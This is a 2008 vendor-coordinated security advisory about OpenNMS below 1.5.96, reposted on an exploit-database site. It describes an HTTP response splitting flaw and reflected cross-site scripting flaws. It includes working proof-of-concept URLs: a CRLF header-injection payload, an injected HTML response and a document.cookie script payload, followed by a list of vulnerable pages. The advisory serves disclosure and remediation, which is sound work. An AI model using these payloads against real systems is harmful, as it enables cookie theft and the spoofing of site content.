0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OpenNMS < 1.5.96 Multiple Remote Vulnerabilities
================================================ OpenNMS < 1.5.96 Multiple Remote Vulnerabilities ================================================ Vendor ------ OpenNMS Group http://www.opennms.com OpenNMS Project http://www.opennms.org Application Description ----------------------- ?OpenNMS is the world's first enterprise grade network management platform developed under the open source model. It consists of a community supported open-source project as well as a commercial services, training, and support organization. - From OpenNMS Project website. OpenNMS HTTP Response Splitting Vulnerability --------------------------------------------- Vulnerability Information ------------------------- Remotely exploitable: Yes Locally exploitable: No Affected versions: OpenNMS 1.5.93-1 Other versions may also be affected. Vulnerability Details --------------------- An input validation problem exists within OpenNMS which allows injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) characters into the server HTTP response header, resulting in a HTTP Response Splitting[1] vulnerability. This vulnerability is possible because the application fails to validate user supplied input, returning it un-sanitized within the server HTTP response header back to the client. This vulnerability not only gives attackers control of the remaining headers and body of the server response, but also allows them to create additional responses entirely under their control. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted. Other attacks are also possible. Proof-of-Concept ---------------- Header injection: http://server/opennms/event/query?%0D%0AInjectedHeader:%20BugSec Server response: HTTP/1.1 302 Moved Temporarily Date: Thu, 25 Sep 2008 11:30:05 GMT Server: Apache/2.2.3 Location: http://server/opennms/event/list? InjectedHeader: BugSec= Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 HTTP Response Splitting: http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text /html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!-- Server response: HTTP/1.1 302 Moved Temporarily Date: Thu, 25 Sep 2008 11:35:20 GMT Server: Apache/2.2.3 Location: http://server/opennms/event/list? Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 36 <html><body>BugSec</body></html><!--= Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 OpenNMS Cross-Site Scripting Vulnerabilities -------------------------------------------- Vulnerability Information ------------------------- Remotely exploitable: Yes Locally exploitable: No Affected versions: ? OpenNMS 1.5.93-1 Other versions may also be affected. Vulnerability Details --------------------- An input validation problem exists within OpenNMS which allows execution of arbitrary client-side code resulting in a cross-site scripting vulnerability. An attacker may leverage cross-site scripting vulnerability to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. Proof-of-Concept ---------------- surveillanceView.htm - viewName http://server/opennms/surveillanceView.htm?viewName=<script>alert(document.cookie)</script> Vulnerable pages http://server/opennms/asset/modifyAsset http://server/opennms/distributedStatusDetails.htm http://server/opennms/distributedStatusHistory.htm http://server/opennms/event/query http://server/opennms/graph/adhoc2.jsp http://server/opennms/graph/chooseresource.htm http://server/opennms/graph/results.htm http://server/opennms/ksc/customView.htm http://server/opennms/ksc/formProcMain.htm http://server/opennms/notification/browse http://server/opennms/notification/list.jsp http://server/opennms/outage/list http://server/opennms/rtc/category.jsp http://server/opennms/statisticsReports/index.htm http://server/opennms/statisticsReports/report.htm http://server/opennms/surveillanceView.htm Security Analysis ----------------- Discovery --------- Moshe Ben-Abu BugSec LTD. - Security Consulting Company http://www.bugsec.com Disclosure Timeline ------------------- 25/09/2008 ? BugSec Security Team notifies OpenNMS team about security vulnerabilities discovered in OpenNMS, sending security advisory draft. 25/09/2008 ? Vendor acknowledgment notification. 26/09/2008 ? OpenNMS 1.5.94 released, fixing HTTP response splitting vulnerability but not the cross-site scripting vulnerabilities. 01/10/2008 ? OpenNMS 1.5.96 released, fixing cross-site scripting vulnerabilities. 05/10/2008 ? Advisory released. About BugSec LTD. ----------------- BugSec Services provide IT & Application Security services for large scaled organizations. Among services; Penetration Testing, Risk Assessments, Secure Code Development and Guidance. BugSec Solutions develops innovative products and tools which gives focused solution to systems data security issues, such as Web Application Security, Secure coding and Anti-Phishing solution. # 0day.today [2024-09-21] #